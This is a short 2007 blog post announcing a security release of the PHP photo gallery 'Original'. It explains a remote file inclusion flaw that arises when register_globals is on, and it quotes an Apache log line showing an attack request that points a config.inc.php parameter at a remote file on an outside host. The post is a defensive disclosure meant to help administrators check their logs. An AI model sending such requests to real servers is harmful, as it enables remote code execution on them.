Original 0.11.2

May 14 2007

While I haven’t really touched original for ages now, I needed to roll out a 0.11.2 now. If you have registerglobals_ set to on, it may be possible for the bad guys to to feed a variable with a get method which is later used to include other bits with require.

Looks like such injected include file can be very curious. In any case, using register_globals is not a very safe thing to do, and I’m not sure allowing to include remote files is good choice either.

Grep your apache logs for something like this to see if you’ve been poked for the vulnerability:

"GET /photos/inc/config.inc.php?x[1]=http://board.4sql.net/login.txt? HTTP/1.1"